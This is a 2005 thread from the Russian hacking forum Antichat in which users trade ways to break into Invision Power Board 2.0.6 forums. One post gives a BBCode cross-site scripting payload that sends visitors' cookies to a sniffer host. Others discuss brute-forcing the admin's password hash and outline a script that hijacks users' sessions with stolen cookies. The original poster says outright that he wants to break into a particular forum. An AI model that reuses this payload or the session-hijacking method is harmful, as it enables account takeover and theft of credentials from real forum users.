Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Вопрос про уязвимости в Ipb 2.0.6 (https://forum.antichat.xyz/showthread.php?t=5559)

Sh1z0iD 20.03.2005 18:17
Вопрос про уязвимости в Ipb 2.0.6
 
Уважаемые Х люди
кто знает уязвимость форума 2.0.6 ?
заранее благодарен :confused:

rsha1988 20.03.2005 18:25
сниффер помойму можно туда вставить

CunningFox 20.03.2005 19:03
да, снифф туда и точка :)

chip 20.03.2005 19:12
А эксплоит есть для него?

rsha1988 20.03.2005 19:27
PHP код:
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[12].src="http:/сниффер/me.jpg?K:"+document.cookie) [/COLOR] 

CunningFox 20.03.2005 19:44
rsha1988 странноватый у тебя снифф..

(-=util=-) 20.03.2005 21:57
а что с хэшом делать потом будем? :) Как с админкой быть? Я незнаю. :\

rsha1988 20.03.2005 21:58
Цитата:
Сообщение от CunningFox
rsha1988 странноватый у тебя снифф..
Ошибся малось, щас все иправил...

rsha1988 20.03.2005 21:58
Цитата:
Сообщение от (-=util=-)
а что с хэшом делать потом будем? :) Как с админкой быть? Я незнаю. :\
шутиш?! :D

(-=util=-) 20.03.2005 22:01
я нешучу =) Ты попробуй сам расшифруй от вторых версий хэш =) Там не чистый md5 а вроде дважды зашифровывается. Т.е. пароль в md5 а потом ещё раз в md5... вообще надо в исходник форума глянуть!

chin 20.03.2005 22:23
Попробуй глянь...... Там так все запутано, что я, 3 года просидевший только за php, не могу разобраться что к чему! ;)
Хотя, можно на досуге...
А вообще, надо искать иной путь, вместо того чтобы брутить хеш админа. Надо подумать - всегда есть альтернативный вариант.
Я тоже пробовать брутить пароль админа на IPB - безрезультатно.
Кстати, хочу написать скриптик:
- сниффит куки пользователя
- заходит с куками (в заголовке) на панель управления пользователя
- меняет ему аватару на нашу
- уходит ;)
Как вам идея? Я подумал, все взвесил - осуществимо!

(-=util=-) 20.03.2005 22:30
Идея велеколепна. Ты представь сколько ламаков будет иметь форумы =\

chin 20.03.2005 22:40
А ты представь, как админы после этого закопошатся в поисках дырок? :) Для них тогда хоть смысл их фиксить появится. А то сидят себе дырявые... хоть бы интересовались изредка...

rsha1988 20.03.2005 22:53
Не, ну так просто и быстро форум ломать не интерессно - быстро надоест.
Лучше всетаки дооооолго брутить а потом получать удавольствие.

Sh1z0iD 21.03.2005 16:24
Цитата:
Сообщение от rsha1988
сниффер помойму можно туда вставить
прости а как вставить я пробовал не вставляется
если представится возможность не мог бы ты снять видео ? :rolleyes: заранее благодарен...

CunningFox 22.03.2005 12:40
форум хотябы в приват оставь, чтобы взглянуть что к чему..

Xalegi 22.03.2005 12:43
дык... сам намути такой форум :)) как правило в последнее время для инвижиона ничего толком не меняется, так как считают, что он неуязвим =)))
эт нам на руку... пока на руку

CunningFox 22.03.2005 12:48
дак у него Ipb форум?

Xalegi 22.03.2005 12:50
как я понял... ДА :)
и вообще.. самое идеальное.. эт самому установить данный форум самому себе и изучать его изнутри... что и где может быть дырка =)

CunningFox 22.03.2005 12:50
а не заметил названия топика :)

Sh1z0iD 23.03.2005 15:03
Ответ
 
Цитата:
Сообщение от Xalegi
дык... сам намути такой форум :)) как правило в последнее время для инвижиона ничего толком не меняется, так как считают, что он неуязвим =)))
эт нам на руку... пока на руку
вообще спасибо за совет
но у меня есть версия того форума которого я хочу поломать НО я не могу найти файл в котором описаны дыры не мог бы ты мне подсказать
какой файл ? а? :confused:

White Jordan 18.04.2005 00:43
2.0.6 IPB не бывает. Самая последния верссия это 2.0.3

Он имел ввиду пхп. :rolleyes:

Manoz 18.04.2005 21:26
Sdaetsya mne, chto eto phpbb 2.0.6. Ssi
ochkoi na forum-to podelis`, a?


Время: 14:47